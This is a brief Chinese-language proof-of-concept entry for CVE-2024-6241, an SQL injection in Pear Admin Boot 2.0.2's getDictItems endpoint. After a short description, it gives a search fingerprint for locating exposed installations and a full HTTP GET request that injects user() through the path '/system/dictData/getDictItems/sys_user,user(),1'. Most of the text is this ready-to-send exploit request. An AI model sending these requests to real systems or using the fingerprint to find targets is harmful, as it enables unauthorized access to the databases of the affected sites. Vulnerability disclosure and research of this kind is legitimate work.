Pear Admin Boot系统getDictItems接口SQL注入漏洞(CVE-2024-6241)
一、漏洞描述
<font style="color:rgb(38, 38, 38);"> </font><font style="color:rgb(51, 51, 51);">在Pear Admin Boot 2.0.2版本中发现了一个漏洞,并被列为严重漏洞。此问题影响文件/system/dictData/getDictItems/的getDictItems函数。输入,user(),1,1 的操作会导致SQL注入。</font>
二、影响版本
Pear Admin Boot
三、资产测绘
"Pear Admin"
四、漏洞复现
GET /system/dictData/getDictItems/sys_user,user(),1 HTTP/1.1
Host:
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Cookie: b-user-id=f9dd81a6-c7fb-f4d8-6875-41efe06a5d4f
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36